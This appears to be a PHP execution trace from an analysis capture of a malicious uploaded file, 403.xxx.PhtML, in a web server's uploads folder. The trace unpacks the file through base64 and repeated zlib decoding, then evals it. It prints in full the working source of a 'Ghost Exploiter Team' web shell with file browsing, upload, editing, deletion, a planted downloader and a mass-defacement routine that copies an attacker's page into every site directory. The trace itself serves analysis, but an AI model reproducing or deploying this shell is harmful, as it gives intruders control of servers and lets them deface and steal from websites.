3 9 0 0.000781 412512 base64_decode 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code 1 1 'ASAQ3+8BGxDk73icvVttc9s2Ev6szOQ/IDyllBKJlOzYTW1JaRO7uU5f0rmkH27ijAciIYkVRbIkFMVN899vdwGQIEXZyb3FY4sCdheLxe6zC4CZPBgO2d/5mr2IMsnZy1VaSHb5IYvTSIqcvRF8c//emxVP1gX7Lo7Zz2Izh3aiK8mQig2Hs/v38Gfy4OLVizf//PWSreQmhsZJ+Sl4CJ+diYxkLGavVwIkPr/JeFGwJ6Nj9vJy+OL09PTFxFcEwOJrHngs5A21fRttsjSXbJvHPWclZVac+f4iTWThLdN0GQueRYUXpBs/KIpnC76J4pvpL2L3+B9psBb5X69XPEx3xeMfEpk+/ilaruRXYVRkMb+ZFjueOf3z+/cesY+gJwodKgFnbJMmaZHxQJybnp1A5jP2dDSCtk/3783T8KZiLKI/xRkbH40eIkeQxml+xv62WCzwa8bDMEqWZwxZOxueL6PkjB2dPGTjUfmLXXMerJd5uk3CoRExHo+xR4oP'
3 9 1 0.000841 420736
3 9 R '\001 \020��\001\033\020��x��[ms�6\022����? <��\022����MmIi\023��N_ҹ�\037n�\a"!�\025E�$\024�M��ow\001� E�ɽ�c�\002v\027���\v��<\030\016�����2���UZHv�!��H���\021|s�ޛ\025O�\005�.���b3�v�+ɐ�\r�����g���Ջ7������&��I�)x\b����d,f�W\002$>��xQ�\'�c��r�������W\004��k\036x,�\r�}\033m�4�l��=g%eV���"Md�-�t\031\v�E�\027�\033?(�g\v����/b��\037i�\026�_�W<Lw��\037\022�>�)Z��WaTd1��\026;�9��\036���\'\n\035*\001gl�&i��@����@�3�t4��O�����b,�?�\031\033\037�\036"G��i~��X,�k��0J�g\fY;\033�/��\035�<d�Q��]s\036��y�M¡\0'
3 10 0 0.001001 412512 gzinflate 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code 1 1 '\001 \020��\001\033\020��x��[ms�6\022����? <��\022����MmIi\023��N_ҹ�\037n�\a"!�\025E�$\024�M��ow\001� E�ɽ�c�\002v\027���\v��<\030\016�����2���UZHv�!��H���\021|s�ޛ\025O�\005�.���b3�v�+ɐ�\r�����g���Ջ7������&��I�)x\b����d,f�W\002$>��xQ�\'�c��r�������W\004��k\036x,�\r�}\033m�4�l��=g%eV���"Md�-�t\031\v�E�\027�\033?(�g\v����/b��\037i�\026�_�W<Lw��\037\022�>�)Z��WaTd1��\026;�9��\036���\'\n\035*\001gl�&i��@����@�3�t4��O�����b,�?�\031\033\037�\036"G��i~��X,�k��0J�g\fY;\033�/��\035�<d�Q��]s\036��y�M¡\0'
3 10 1 0.001164 420736
3 10 R '\001\033\020��x��[ms�6\022����? <��\022����MmIi\023��N_ҹ�\037n�\a"!�\025E�$\024�M��ow\001� E�ɽ�c�\002v\027���\v��<\030\016�����2���UZHv�!��H���\021|s�ޛ\025O�\005�.���b3�v�+ɐ�\r�����g���Ջ7������&��I�)x\b����d,f�W\002$>��xQ�\'�c��r�������W\004��k\036x,�\r�}\033m�4�l��=g%eV���"Md�-�t\031\v�E�\027�\033?(�g\v����/b��\037i�\026�_�W<Lw��\037\022�>�)Z��WaTd1��\026;�9��\036���\'\n\035*\001gl�&i��@����@�3�t4��O�����b,�?�\031\033\037�\036"G��i~��X,�k��0J�g\fY;\033�/��\035�<d�Q��]s\036��y�M¡\0211\036��G�'
3 11 0 0.001322 412512 gzinflate 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code 1 1 '\001\033\020��x��[ms�6\022����? <��\022����MmIi\023��N_ҹ�\037n�\a"!�\025E�$\024�M��ow\001� E�ɽ�c�\002v\027���\v��<\030\016�����2���UZHv�!��H���\021|s�ޛ\025O�\005�.���b3�v�+ɐ�\r�����g���Ջ7������&��I�)x\b����d,f�W\002$>��xQ�\'�c��r�������W\004��k\036x,�\r�}\033m�4�l��=g%eV���"Md�-�t\031\v�E�\027�\033?(�g\v����/b��\037i�\026�_�W<Lw��\037\022�>�)Z��WaTd1��\026;�9��\036���\'\n\035*\001gl�&i��@����@�3�t4��O�����b,�?�\031\033\037�\036"G��i~��X,�k��0J�g\fY;\033�/��\035�<d�Q��]s\036��y�M¡\0211\036��G�'
3 11 1 0.001475 420736
3 11 R 'x��[ms�6\022����? <��\022����MmIi\023��N_ҹ�\037n�\a"!�\025E�$\024�M��ow\001� E�ɽ�c�\002v\027���\v��<\030\016�����2���UZHv�!��H���\021|s�ޛ\025O�\005�.���b3�v�+ɐ�\r�����g���Ջ7������&��I�)x\b����d,f�W\002$>��xQ�\'�c��r�������W\004��k\036x,�\r�}\033m�4�l��=g%eV���"Md�-�t\031\v�E�\027�\033?(�g\v����/b��\037i�\026�_�W<Lw��\037\022�>�)Z��WaTd1��\026;�9��\036���\'\n\035*\001gl�&i��@����@�3�t4��O�����b,�?�\031\033\037�\036"G��i~��X,�k��0J�g\fY;\033�/��\035�<d�Q��]s\036��y�M¡\0211\036��G�\0170\bM���9�'
3 12 0 0.001631 412512 gzuncompress 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code 1 1 'x��[ms�6\022����? <��\022����MmIi\023��N_ҹ�\037n�\a"!�\025E�$\024�M��ow\001� E�ɽ�c�\002v\027���\v��<\030\016�����2���UZHv�!��H���\021|s�ޛ\025O�\005�.���b3�v�+ɐ�\r�����g���Ջ7������&��I�)x\b����d,f�W\002$>��xQ�\'�c��r�������W\004��k\036x,�\r�}\033m�4�l��=g%eV���"Md�-�t\031\v�E�\027�\033?(�g\v����/b��\037i�\026�_�W<Lw��\037\022�>�)Z��WaTd1��\026;�9��\036���\'\n\035*\001gl�&i��@����@�3�t4��O�����b,�?�\031\033\037�\036"G��i~��X,�k��0J�g\fY;\033�/��\035�<d�Q��]s\036��y�M¡\0211\036��G�\0170\bM���9�'
3 12 1 0.001860 428928
3 12 R '<!-- Hak Cipta Ghost Exploiter Team\r\nThanks All Member GhostExploiterTeam -->\r\n\r\n\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n\t<title>Shell Bypass 403 GE-C666C</title>\r\n</head>\r\n\r\n<style>\r\n@import url("https://fonts.googleapis.com/css?family=New+Rocker|Shadows+Into+Light&display=swap");\r\n* {\r\n\tfont-family: monospace;\r\n\tfont-weight: 800;\r\n}\r\nbody {\r\n\tfont-size: 120%;\r\n\tcolor: #fff;\r\n\tpadding: 0;\r\n\tmargin: 25% 10% 10% 10%;\r\n\tbackground-color: #111;\r\n\ttext-shadow: rgb'
3 13 0 0.002358 478848 eval 1 '?><!-- Hak Cipta Ghost Exploiter Team\r\nThanks All Member GhostExploiterTeam -->\r\n\r\n\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n\t<title>Shell Bypass 403 GE-C666C</title>\r\n</head>\r\n\r\n<style>\r\n@import url("https://fonts.googleapis.com/css?family=New+Rocker|Shadows+Into+Light&display=swap");\r\n* {\r\n\tfont-family: monospace;\r\n\tfont-weight: 800;\r\n}\r\nbody {\r\n\tfont-size: 120%;\r\n\tcolor: #fff;\r\n\tpadding: 0;\r\n\tmargin: 25% 10% 10% 10%;\r\n\tbackground-color: #111;\r\n\ttext-shadow: rgba(0,0,0,1) 2px 2px 0.1em;\r\n}\r\ntable {\r\n\tmargin: auto;\r\n\tmargin-bottom: 20px;\r\n\twidth: 96%;\r\n}\r\ntable td {\r\n\ttransition: all .5s;\r\n}\r\n.data-table {\r\n\tborder-collapse: collapse;\r\n\tfont-size: 110%;\r\n\tmin-width: 600px;\r\n}\r\n.data-table th, \r\n.data-table td {\r\n\tborder: none;\r\n\tpadding: 7px 15px;\r\n\twidth: 33%;\r\n}\r\nh3.title{\r\n\tmargin-bottom: 20px;\r\n\tmargin-top: 0px;\r\n\ttext-align: left;\r\n\tbackground-color: #f00;\r\n\tpadding: 10px;\r\n\tfont-weight: 900;\r\n\tfont-size: 160%;\r\n\tfont-family: New Rocker;\r\n}\r\n.data-table tbody td {\r\n\tcolor: #fff;\r\n\tbackground-color: #282828;\r\n}\r\n.data-table tbody td:nth-child(4),\r\n.data-table tbody td:last-child {\r\n\ttext-align: left;\r\n}\r\n.data-table tbody td:first-child{\r\n\ttext-align: left;\r\n}\r\n.data-table tbody tr:nth-child(odd) td {\r\n\tbackground-color: #222;\r\n}\r\n.data-table tbody tr:hover td {\r\n\tbackground-color: #151515;\r\n\tborder-color: #ccc;\r\n}\r\n.data-table tbody tr.stamp td {\r\n\tcolor: #fff;\r\n\tbackground-color: #000;\r\n}\r\n.data-table tbody tr.data td.nick {\r\n\tcolor: #f00;\r\n}\r\n.kotak{\r\n\tborder: 2px solid #f00;\r\n\twidth: 100%;;\r\n\tborder-radius: 6px;\r\n\tbox-shadow: rgba(0,0,0,1) 3px 3px 5em;\r\n\tpadding-bottom: 10px;\r\n}\r\n.btn{\r\n\tbackground-color: #f00;\r\n\tborder-radius: 5px;\r\n\tborder: 2px solid red;\r\n\twidth: 75px;\r\n\theight: 27px;\r\n\tfont-size: 0.8em;\r\n\tfont-weight: 600;\r\n\tcolor: #fff;\r\n\toutline: none;\r\n\tmargin: 4px;\r\n\tfont-weight: 900;\r\n\tpadding: 2px 3px;\r\n\ttext-shadow: none;\r\n}\r\n.btn:hover{\r\n\tbox-shadow: 0px 0px 2px 2px darkred;\r\n}\r\n\r\na{\r\n\tcolor: #fff;\r\n\ttext-decoration: none;\r\n}\r\na:hover{\r\n\tcolor: #fff;\r\n}\r\n.nav_up{\r\n\tmargin: 2%;;\r\n\tmargin-top: 0px;\r\n}\r\n.stamp th{\r\n\tfont-size: 140%;\r\n}\r\n.dirname{\r\n\tcolor: #f00;\r\n}\r\n.filename{\r\n\tcolor: #fff;\r\n}\r\ninput.btn.mini{\r\n\twidth: 35px;\r\n\theight: 24px;\r\n}\r\n.dirnav{\r\n\tmargin-bottom: 20px;\r\n}\r\n.dirnav a{\r\n\tcolor: lime;\r\n}\r\ntextarea{\r\n\twidth: 95.5%;\r\n\theight: 400px;\r\n}\r\n.balik{\r\n\tmargin-right: 200px;\r\n}\r\n.data-table th.det, \r\n.data-table td.det{\r\n\twidth: 25%;\r\n}\r\n.fileinput{\r\n\twidth: 100px;\r\n}\r\n.new{\r\n\twidth: 160px;\r\n}\r\n.newf{\r\n\twidth: 90px;\r\n}\r\n.hide{\r\n\tdisplay: none;\r\n}\r\n.rmf{\r\n\tmargin-right: -5px;\r\n}\r\n.go{\r\n\tbackground-color: green;\r\n\tborder: none;\r\n}\r\n.go:hover{\r\n\tbox-shadow: 0px 0px 2px 2px darkgreen;\r\n}\r\n.fitur{\r\n\ttext-align: right;\r\n\tmargin-top: -15px;\r\n\tmargin-right: 1%;\r\n}\r\n.massarea{\r\n\tfont-size: 60%;\r\n\tmargin: 2%;\r\n}\r\n.mass{\r\n\tmargin-left: 2%;\r\n\tmargin-top: 1%;\r\n\tmargin-right: 2%;\r\n\tfont-size: 60%;\r\n}\r\n.massresult{\r\n\tmargin-top: 8%;\r\n\tfont-size: 80%;\r\n\tmargin-left: 2%;\r\n\ttext-align: left;\r\n}\r\n.inputmass{\r\n\ttext-align: left;\r\n}\r\n.massbt{\r\n\tfont-size: 60%;\r\n}\r\n.massform{\r\n\tmargin-top: 6%;\r\n}\r\n.fbawah,.fatas{\r\n\tdisplay: inline-block;\r\n}\r\n</style>\r\n<body>\r\n<div class="kotak">\r\n\t<h3 class="title">Ghost Exploiter Team Official</h3>\r\n\t<div class="fitur">\r\n\t\t\t<button type="button" class="btn massbt" onclick="display(\'tabel\',\'massform\')">Mass Deface</button>\r\n\t</div>\r\n\t<div class="nav_up">\r\n\r\n<?php\r\n\r\n\r\n@ob_clean();\r\n\r\nif (isset($_GET[\'dir\'])) {\r\n\t$dir = $_GET[\'dir\'];\r\n} else {\r\n\t$dir = getcwd();\r\n}\r\n\t\t$dir = str_replace("\\\\", "/", $dir);\r\n\t\t$dirs = explode("/", $dir);\r\n\t\r\n\t\tforeach ($dirs as $key => $value) {\r\n\t\t\tif ($value == "" && $key == 0){\r\n\t\t\t\techo \'<h3 class="dirnav">Directory >> <a href="/">/</a>\'; continue;\r\n\t\t\t} echo \'<a href="?dir=\';\r\n\t\r\n\t\t\tfor ($i=0; $i <= $key ; $i++) { \r\n\t\t\t\techo "$dirs[$i]"; if ($key !== $i) echo "/";\r\n\t\t\t} echo \'">\'.$value.\'</a>/\';\r\n\t}\r\n\techo \'</h3>\';\r\nif (isset($_POST[\'upl\'])){\r\n\t\r\n\t\t$namafile = $_FILES[\'upload\'][\'name\'];\r\n\t\t$tempatfile = $_FILES[\'upload\'][\'tmp_name\'];\r\n\t\t$tempat = $_GET[\'dir\'];\r\n\t\t$error = $_FILES[\'upload\'][\'error\'];\r\n\t\t$ukuranfile = $_FILES[\'upload\'][\'size\'];\r\n\t\r\n\t\tmove_uploaded_file($tempatfile, $dir.\'/\'.$namafile);\r\n\t\t\t\techo "\r\n\t\t\t\t\t<script>alert(\'file terupload!\');</script>\r\n\t\t\t\t\t";\r\n\t}\r\n\t?>\r\n\t<form method="post" enctype="multipart/form-data">\r\n\t<input type="file" name="upload">\r\n\t<input type="submit" name="upl" value="Upload">\r\n\t</form>\r\n\t</div>\r\n<center>\r\n<!--Mass Deface-->\r\n<?php\r\necho "\r\n\t<form method=\'post\' class=\'hide massform\' id=\'massform\'>\r\n\t<font color=\'#f00\' size=\'6px\'>Mass Deface Auto Detect Domain</font><br><br><br>\r\n\t\t<div class=\'inputmass\'>\r\n\t\t<input class=\'mass\' type=\'text\' name=\'pwd\' size=\'50\' value=\'$dir\'><font color=\'silver\' size=\'1px\'>/*Ubah Ke document_root untuk mass deface*/</font><br>\r\n\t\t<input class=\'mass\' type=\'text\' name=\'namasc\' size=\'50\' placeholder=\'namafile.ext\'><br>\r\n\t\t</div>\r\n\t\t<textarea name=\'scdeface\' width=\'400px\' placeholder=\'scdeface\' class=\'massarea\'></textarea>\r\n\t\t<input type=\'submit\' name=\'massdef\' value=\'Start\' class=\'btn edt\'><br>\r\n\t</form>";\r\n?>\r\n<!--Table-->\r\n\t<table class="data-table" id="tabel">\r\n\t\t<thead>\r\n\t\t\t<tr class="stamp">\r\n\t\t\t\t<th>File / Folder</th>\r\n\t\t\t\t<th>Size</th>\r\n\t\t\t\t<th>Action</th>\r\n\t\t\t</tr>\r\n\t\t</thead>\r\n\t\t<tbody>\r\n\t\t<tr>\r\n\t\t\t<td style="color: lime">.</td>\r\n\t\t\t<td style="color: lime"><center>-</center></td>\r\n\t\t\t<td><center>\r\n\t\t\t<div id="divneww" style="display:none">\r\n\t\t\t<form method="POST">\r\n\t\t\t<input name="createname" class="fileinput new" type="text" size="20" placeholder="nama" required/>\r\n\t\t\t<select name="type">\r\n\t\t\t\t<option disabled="disabled" selected="selected">type</option>\r\n\t\t\t\t<option value="file">file</option>\r\n\t\t\t\t<option value="dir">dir</option>\r\n\t\t\t</select>\r\n\t\t\t<input type="submit" value="Go" class="btn mini go" name="createnew"/>\r\n\t\t\t</form>\r\n\t\t\t</div>\r\n\t\t\t<?php\r\n\t\t\techo \'<div id="divnew"><button class="btn newf" onclick=\\\'display("divnew","divneww")\\\'>+File/Dir</button></div>\';\r\n\t\t\t?>\r\n\t\t\t</center>\r\n\t\t\t</td>\r\n\t\t</tr>\r\n\t<?php\r\n\r\n\t$scan = scandir($dir);\r\n\r\nforeach ($scan as $directory) {\r\n\tif (!is_dir($dir.\'/\'.$directory) || $directory == \'.\' || $directory == \'..\') continue;\r\n\r\n\techo \'\r\n\t<tr class="data">\r\n\t<td class="det">\r\n\t<a class="dirname" href="?dir=\'.$dir.\'/\'.$directory.\'">\'.dirlimit($directory).\'</a>\r\n\t</td>\r\n\t<td style="color: red;"><center>--</center></td>\r\n\t<td>\r\n\t<center>\';\r\n\techo \'<form method="POST" id="\'.clearspace($directory).\'_form" class="hide">\r\n\t<input name="newname" class="fileinput" type="text" size="20" value="\'.$directory.\'" required/>\r\n\t<input type="hidden" name="path" value="\'.$dir.\'">\r\n\t<input type="hidden" name="oldname" value="\'.$directory.\'">\r\n\t<input type="submit" value="Go" class="btn mini go"/>\r\n\t</form>\';\r\n\techo \'<div id="\'.clearspace($directory).\'_link">\r\n\t<form method="post">\r\n\t<input type="hidden" value="\'.$dir.\'/\'.$directory.\'" name="dirdl">\r\n\t<input type="hidden" value="\'.$dir.\'" name="dirpath">\r\n\t<input type="submit" value="del" name="rmdir" class="btn mini">\';\r\n\techo \'<a class="btn" href=\\\'javascript:display("\'.clearspace($directory).\'_link","\'.clearspace($directory).\'_form");\\\'>ren</a>\';\r\n\techo \'</form>\r\n\t</div>\r\n\t</center>\r\n\t</td>\r\n\t</tr>\r\n\t\';\r\n\t}\r\nforeach ($scan as $file) {\r\n\tif (!is_file($dir.\'/\'.$file)) continue;\r\n\r\n\t$jumlah = filesize($dir.\'/\'.$file)/1024;\r\n\t$jumlah = round($jumlah, 3);\r\n\tif ($jumlah >= 1024) {\r\n\t\t$jumlah = round($jumlah/1024, 2).\'MB\';\r\n\t} else {\r\n\t\t$jumlah = $jumlah .\'KB\';\r\n\t}\r\n\r\n\techo \'\r\n\t<tr>\r\n\t<td><a class="filename" href="?dir=\'.$dir.\'&open=\'.$file.\'">\'.wordlimit($file).\'</a></td>\r\n\t<td style="color: lime;"><center>\'.$jumlah.\'</center></td>\r\n\t<td><center>\';\r\n\techo \'<form method="POST" id="\'.clearfile($file).\'_form" class="hide">\r\n\t<input name="newname" class="fileinput" type="text" size="20" value="\'.$file.\'" required/>\r\n\t<input type="hidden" name="path" value="\'.$dir.\'">\r\n\t<input type="hidden" name="oldname" value="\'.$file.\'">\r\n\t<input type="submit" value="Go" class="btn mini go"/>\r\n\t</form>\';\r\n\techo \'\r\n\t<div id="\'.clearfile($file).\'_link">\r\n\t<form method="post" class="fatas">\r\n\t<input type="hidden" value="\'.$dir.\'/\'.$file.\'" name="filedl">\r\n\t<input type="hidden" value="\'.$dir.\'" name="filepath">\r\n\t<input type="submit" value="del" name="rmfile" class="btn mini rmf">\r\n\t<a href="?dir=\'.$dir.\'&ubah=\'.$file.\'" class="btn">edt</a>\';\r\n\techo \'<a class="btn" href=\\\'javascript:display("\'.clearfile($file).\'_link","\'.clearfile($file).\'_form");\\\'>ren</a>\';\r\n\techo \'</form><form action="fdl.php" method="post" class="fbawah">\r\n\t<input type="hidden" value="\'.$dir.\'" name="dlpath">\r\n\t<input type="hidden" value="\'.$file.\'" name="dlname">\r\n\t<input type="submit" value="dl" name="dlfile" class="btn mini rmf">\r\n\t</form></div></center>\r\n\t</td>\r\n\t</tr>\r\n\t\';\r\n}\r\n\r\necho \'\r\n\t</tbody>\r\n\t</table>\r\n\';\r\n\r\n/*action*/\r\nif (isset($_GET[\'open\'])) {\r\n\techo \'\r\n\t<br />\r\n\t<style>\r\n\t\ttable{\r\n\t\t\tdisplay: none;\r\n\t\t}\r\n\t</style>\r\n\t<textarea>\'.htmlspecialchars(file_get_contents($_GET[\'dir\'].\'/\'.$_GET[\'open\'])).\'</textarea>\r\n\t\';\r\n}\r\n\r\nif (isset($_POST[\'rmfile\'])) {\r\n\tif (unlink($_POST[\'filedl\'])) {\r\n\t\techo "<script>alert(\'Delete Ok !\');window.location=\'?dir=".$_POST[\'filepath\']."\';</script>";\r\n\t}\r\n}\r\n\r\nif (isset($_POST[\'rmdir\'])){\r\n\t$files = glob(\'\'.$_POST[\'dirdl\'].\'/*\');\r\n\tforeach ($files as $file) {\r\n\t\tif (is_file($file)){\r\n\t\t\tunlink($file); // hapus file\r\n\t\t}\r\n\t}\r\n\tif(rmdir($_POST[\'dirdl\'])){\r\n\t\techo "<script>alert(\'Delete Ok !\');window.location=\'?dir=".$_POST[\'dirpath\']."\';</script>";\r\n\t}else{\r\n\t\techo "<script>alert(\'err ".$_POST[\'dirdl\']."!\');</script>";\r\n\t}\r\n}\r\n\r\nif(isset($_GET[\'ubah\'])){\r\n\tif(isset($_POST[\'edit\'])){\r\n\t\t$fp = fopen($_POST[\'object\'], \'w\');\r\n\t\tif(fwrite($fp,$_POST[\'edit\'])){\r\n\t\t\techo "<script>alert(\'Edit Ok !\');window.location=\'?dir=".$_GET[\'dir\']."\';</script>";\r\n\t\t}else{\r\n\t\t\terr();\r\n\t\t}\r\n\t\tfclose($fp);\r\n\t}\r\n\t\r\n$hell = $_GET[\'dir\'];\r\n$yeah = $_GET[\'ubah\'];\r\n$patc = "$hell/$yeah";\r\n\r\necho \'<style>\r\n\t\t\ttable {\r\n\t\t\t\tdisplay: none;\r\n\t\t\t}\r\n\t\t</style>\r\n\r\n\t\t<form method="post" action="">\r\n\t\t<input type="hidden" name="object" value="\'.$patc.\'">\r\n\t\t<textarea name="edit">\'.htmlspecialchars(file_get_contents($patc)).\'</textarea>\r\n\t\t<a href="?dir=\'.$dir.\'" class="balik"><=Back</a>\r\n\t\t<button type="submit" name="go" value="Submit" class="btn edt">Liking</button>\r\n\t\t</form>\r\n\t\t\';\r\n}\r\nif(isset($_POST[\'newname\'])){\r\n\tif(rename($_POST[\'path\'].\'/\'.$_POST[\'oldname\'], $_POST[\'path\'] . \'/\' .$_POST[\'newname\'])){\r\n\t\tok();\r\n\t}else{\r\n\t\terr();\r\n\t}\r\n}\r\nif(isset($_POST[\'createnew\']) && $_POST[\'createname\'] != \'\'){\r\n\tif($_POST[\'type\'] == \'file\'){\r\n\t\t$newfl = $dir. \'/\' . $_POST[\'createname\'];\r\n\t\tif(isset($newfl)){\r\n\t\t\tif(fopen($newfl,\'w\')){\r\n\t\t\t\tok();\r\n\t\t\t}else{\r\n\t\t\t\terr();\r\n\t\t\t}\r\n\t\t}\r\n\t}elseif($_POST[\'type\'] == \'dir\'){\r\n\t\t$newdir = $dir. \'/\' .$_POST[\'createname\'];\r\n\t\tif(mkdir($newdir)){\r\n\t\t\tok();\r\n\t\t}else{\r\n\t\t\terr();\r\n\t\t}\r\n\t}else{\r\n\t\techo "<script>alert(\'Pilih type !\');</script>";\r\n\t}\r\n}\r\nif(isset($_POST[\'massdef\'])){\r\necho \'<style>\r\n\t\t\ttable {\r\n\t\t\t\tdisplay: none;\r\n\t\t\t}\r\n\t\t</style>\';\r\n$nama = $_POST[\'namasc\'];\r\n$sc = $_POST[\'scdeface\'];\r\n$bikin = fopen($nama, "w");\r\n\t\t fwrite($bikin, $sc);\r\n\t\t fclose($bikin);\r\n$root = $_POST[\'pwd\'];\r\n$scan = scandir($root);\r\necho "<div class=\'massresult\'>";\r\necho "<font color=\'lime\'>[ DETECTED DOMAINS ] : </font><br><br><textarea>";\r\nforeach ( $scan as $a ) {\r\n\t$dir = $a;\r\n\t$full = $root.\'/\'.$a.\'/\'.$nama;\r\n\t$ekse = @copy($nama, $full);\r\n\tif($ekse) { \r\n\t/*filtering dikit :v*/\r\n\t\tif(preg_match(\'/[\\w]+[.]+[a-z]+/i\', $dir,$match)) {\r\n\t\t\techo "http://$dir/$nama\\n";\r\n\t\t}\r\n\t}\r\n}\r\necho "\\n\\nNB : Kalo ada dir/domain yang gak terdetect isi sendiri yak :v\\nPutra Gans tq</textarea>";\r\necho "</div>";\r\n}\r\n\r\n$fdlvalue = \'<?php \r\n$file_url = $_POST["dlpath"]."/".$_POST["dlname"]; \r\nheader("Content-Type: application/octet-stream"); \r\nheader("Content-Transfer-Encoding: utf-8"); \r\nheader("Content-disposition: attachment; filename=\\"" . basename($file_url) . "\\""); \r\nreadfile($file_url); \r\n?> \';\r\n$dlwrite = fopen(\'fdl.php\', \'w\');\r\nfwrite($dlwrite, $fdlvalue);\r\nfclose($dlwrite);\r\n/*function*/\r\nfunction wordlimit($file,$limit=26){\r\n\tif(strlen($file)>$limit)\r\n\t$word = mb_substr($file,0,$limit-3)."<font color=#f00>...</font>";\r\n\telse\r\n\t$word = $file;\r\n\treturn $word; \r\n}\r\nfunction dirlimit($directory,$limit=22){\r\n\tif(strlen($directory)>$limit)\r\n\t$dirlim = mb_substr($directory,0,$limit-3)."<font color=#fff>...</font>";\r\n\telse\r\n\t$dirlim = $directory;\r\n\treturn $dirlim; \r\n}\r\nfunction ok(){\r\n\techo "<script>alert(\'Berhasil !\');window.location=\'\';</script>";\r\n}\r\nfunction err(){\r\n\techo "<script>alert(\'Gagal !\');window.location=\'\';</script>";\r\n}\r\nfunction clearspace($directory){\r\n\treturn str_replace(" ","_",$directory);\r\n}\r\nfunction clearfile($file){\r\n\treturn str_replace(" ","_",$file);\r\n}\r\n\r\n?>\r\n<!--Logger-->\r\n\r\n<script type="text/javascript">\r\n\tfunction display(hide,show){\r\n\t\tdocument.getElementById(hide).style.display = \'none\';\r\n\t\tdocument.getElementById(show).style.display = \'block\';\r\n\t}\r\n</script>\r\n</body>\r\n</html>' /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code 1 0
4 14 0 0.002946 478848 ob_clean 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 213 0
4 14 1 0.002973 478848
4 14 R TRUE
4 15 0 0.003002 478848 getcwd 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 218 0
4 15 1 0.003030 478896
4 15 R '/var/www/html/uploads'
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 218 $dir = '/var/www/html/uploads'
4 16 0 0.003083 478896 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 220 3 '\\' '/' '/var/www/html/uploads'
4 16 1 0.003110 478992
4 16 R '/var/www/html/uploads'
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 220 $dir = '/var/www/html/uploads'
4 17 0 0.003161 478896 explode 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 221 2 '/' '/var/www/html/uploads'
4 17 1 0.003186 479472
4 17 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 221 $dirs = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 223 $key = 0
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 223 $key = 1
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i = 0
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 223 $key = 2
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i = 0
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 223 $key = 3
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i = 0
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 223 $key = 4
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i = 0
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 228 $i++
4 18 0 0.003677 479400 scandir 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 299 1 '/var/www/html/uploads'
4 18 1 0.003748 480024
4 18 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '403.xxx.PhtML', 4 => 'data', 5 => 'prepend.php']
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 299 $scan = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '403.xxx.PhtML', 4 => 'data', 5 => 'prepend.php']
4 19 0 0.003812 480040 is_dir 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 302 1 '/var/www/html/uploads/.'
4 19 1 0.003843 480104
4 19 R TRUE
4 20 0 0.003866 480072 is_dir 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 302 1 '/var/www/html/uploads/..'
4 20 1 0.003890 480120
4 20 R TRUE
4 21 0 0.003912 480080 is_dir 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 302 1 '/var/www/html/uploads/.htaccess'
4 21 1 0.003938 480120
4 21 R FALSE
